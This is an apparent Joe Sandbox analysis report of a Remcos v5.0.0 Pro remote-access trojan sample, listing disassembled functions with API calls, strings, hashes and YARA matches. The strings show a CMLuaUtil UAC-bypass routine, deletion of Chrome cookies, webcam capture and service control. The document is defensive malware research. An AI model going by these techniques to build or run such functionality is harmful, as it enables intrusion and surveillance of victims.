                        • API String ID: 1133728706-4073444585
                        • Opcode ID: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                        • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                        • Opcode Fuzzy Hash: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                        • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                        Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                        • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                        • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                        • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                        Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                        • _free.LIBCMT ref: 00450F48
                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                        • _free.LIBCMT ref: 00450F53
                        • _free.LIBCMT ref: 00450F5E
                        • _free.LIBCMT ref: 00450FB2
                        • _free.LIBCMT ref: 00450FBD
                        • _free.LIBCMT ref: 00450FC8
                        • _free.LIBCMT ref: 00450FD3
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                        • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                        • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                        Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                        Download Yara Rule
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                        • int.LIBCPMT ref: 00411183
                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                        • std::_Facet_Register.LIBCPMT ref: 004111C3
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                        • String ID: (mG
                        • API String ID: 2536120697-4059303827
                        • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                        • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                        • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                        • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                        Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                          • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                          • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                          • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                        • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCurrentOpenProcessQueryValue
                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                        • API String ID: 1866151309-2070987746
                        • Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                        • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                        • Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                        • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                        Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                        • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                        • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                        • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                        • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                        Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                        Download Yara Rule
                        APIs
                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\jdSldfVS.exe), ref: 004075D0
                          • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                          • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                        • CoUninitialize.OLE32 ref: 00407629
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InitializeObjectUninitialize_wcslen
                        • String ID: C:\Users\user\AppData\Roaming\jdSldfVS.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                        • API String ID: 3851391207-1448446123
                        • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                        • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                        • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                        • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                        Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                        • GetLastError.KERNEL32 ref: 0040BAE7
                        Strings
                        • [Chrome Cookies not found], xrefs: 0040BB01
                        • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                        • UserProfile, xrefs: 0040BAAD
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteErrorFileLast
                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        • API String ID: 2018770650-304995407
                        • Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                        • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                        • Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                        • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                        Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                        Download Yara Rule
                        APIs
                        • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                        • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Console$AllocOutputShowWindow
                        • String ID: Remcos v$5.0.0 Pro$CONOUT$
                        • API String ID: 2425139147-2278869229
                        • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                        • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                        • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                        • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                        Function 0044333A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                        • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$PkGNG$mscoree.dll
                        • API String ID: 4061214504-213444651
                        • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                        • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                        • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                        • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                        Function 0041ADC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                        • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                        • Sleep.KERNEL32(00002710), ref: 0041AE07
                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: PlaySound$HandleLocalModuleSleepTime
                        • String ID: Alarm triggered$`#v
                        • API String ID: 614609389-3049340936
                        • Opcode ID: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                        • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                        • Opcode Fuzzy Hash: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                        • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                        Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                        Download Yara Rule
                        APIs
                        • __allrem.LIBCMT ref: 0043AC69
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                        • __allrem.LIBCMT ref: 0043AC9C
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                        • __allrem.LIBCMT ref: 0043ACD1
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 1992179935-0
                        • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                        • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                        • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                        • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                        Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00000000,?), ref: 004044C4
                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: H_prologSleep
                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                        • API String ID: 3469354165-3054508432
                        • Opcode ID: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
                        • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                        • Opcode Fuzzy Hash: 08fcd3a8c76131e8007374677ce5b6c0692de0a008e8c0ef5a68710063425739
                        • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                        Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: __cftoe
                        • String ID:
                        • API String ID: 4189289331-0
                        • Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                        • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                        • Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                        • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                        Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                        • String ID:
                        • API String ID: 493672254-0
                        • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                        • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                        • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                        • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                        Function 0044A004 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: __alldvrm$_strrchr
                        • String ID: PkGNG
                        • API String ID: 1036877536-263838557
                        • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                        • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                        • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                        • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                        Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                        • _free.LIBCMT ref: 0044824C
                        • _free.LIBCMT ref: 00448274
                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                        • _abort.LIBCMT ref: 00448293
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$_free$_abort
                        • String ID:
                        • API String ID: 3160817290-0
                        • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                        • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                        • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                        • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                        Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                        • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                        • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                        • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                        Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                        • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                        • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                        • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                        Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                        • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                        • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                        • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                        Function 00442801 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: PkGNG
                        • API String ID: 0-263838557
                        • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                        • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                        • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                        • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                        Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                        • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                        • CloseHandle.KERNEL32(?), ref: 00404DDB
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                        • String ID: PkGNG
                        • API String ID: 3360349984-263838557
                        • Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                        • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                        • Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
